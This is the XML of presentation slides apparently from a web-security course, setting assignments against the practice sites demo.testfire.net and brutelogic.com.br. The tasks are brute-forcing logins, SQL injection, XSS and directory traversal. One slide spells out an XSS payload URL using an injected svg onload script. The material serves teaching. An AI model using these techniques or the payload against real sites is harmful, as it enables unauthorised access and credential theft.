              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://demo.testfire.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hack the login credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: first hack the username and later password using brute-force attacks]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109358848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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://demo.testfire.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hack the password when user name is known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: hack the password using SQL injection ; use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackbar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400371297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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://demo.testfire.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find XSS vulnerability in front-end &amp; back-end application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: search field before login &amp; after login]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150965700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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://demo.testfire.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find file traversal/directory listing vulnerability, after login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: use categories, pictures section]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243700681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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://brutelogic.com.br/xss.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find XSS vulnerability in the URL load</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackbar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payloadsallthethings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vectors or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://brutelogic.com.br/xss.php/%22%3E%3Csvg%20onload=alert(1)%3E </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63410626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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
